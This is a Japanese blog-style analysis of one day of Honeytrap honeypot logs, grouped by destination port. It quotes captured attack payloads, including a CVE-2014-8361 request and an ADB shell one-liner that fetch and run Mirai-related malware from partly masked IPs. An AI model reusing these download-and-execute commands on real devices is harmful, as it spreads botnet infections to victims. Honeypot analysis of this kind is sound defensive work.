Splunkにログをうまく取り込めず、泣きそうになりましたが、8/12の分析を書いていこうと思います。

今回も、ログの取り込み作業に時間がかかってしまったため、Honeytrapのみとなります。

Honeytrap分析
 ▪8/12 総検知数 5746 （内、データサイズ 0byte 以上 2549 件)

＜宛先ポート別 TOP10＞

 <宛先ポートごとのペイロード(抜粋)>
445ポート:
PC NETWORK PROGRAM 1.0LANMAN1.0Windows for Workgroups 3.1aLM1.2X002LANMAN2.1NT LM 0.12

3389ポート:
Cookie: mstshash=hello

52869 ポート：
CVE-2014-8361 の脆弱性を狙ったもの（Mirai関連のマルウェアをダウンロード）
・POST /picsdesc.xml
　wget http[:]//212[.]237[.]32[.]xx/mips -O am

・POST /wanipcn.xml 　
　wget http[:]//212[.]237[.]32[.]xx -O am

2455ポート：
SMBr@@PC NETWORK PROGRAM 1.0MICROSOFT NETWORKS 1.03MICROSOFT NETWORKS 3.0LANMAN1.0LM1.2X002SambaNT LANMAN 1.0NT LM 0.12

8545 ポート：
POST / HTTP/1.1
User-Agent: python-requests/2.13.0
Content-Type: application/json
{"params": [], "jsonrpc": "2.0", "method": "web3_clientVersion", "id": 67}
→JSON RPC が動作しているかの調査行為と思われます。

5555ポート：
shell:cd /data/local/tmp;wget http[:]//207[.]148[.]78[.]xxx/br -O- >br;sh br;busybox wget http[:]//207[.]148[.]78[.]xxx/r -O- >r;sh r;curl http[:]//207[.]148[.]78[.]xxx/c >c;sh c;busybox curl http[:]//207[.]148[.]78[.]xxx/bc >bc;sh bc;rm -rf bc br r c;"
→Mirai関連のマルウェアをダウンロード

＜送信元IP別TOP10＞

昨日と比較して、JSON RPCの調査行為が増えたものの、傾向は前日とあまり変わっていませんでした。

明確に攻撃であると分かるものは、Mirai系のマルウェアのダウンロードであり、検知数の上位のほとんどが調査行為と思われる通信でした。

検知数上位は傾向が変わらないため、次回は検知数の少ないもの を調査しようと思います。

今回は簡易ですが、以上が 分析結果となります。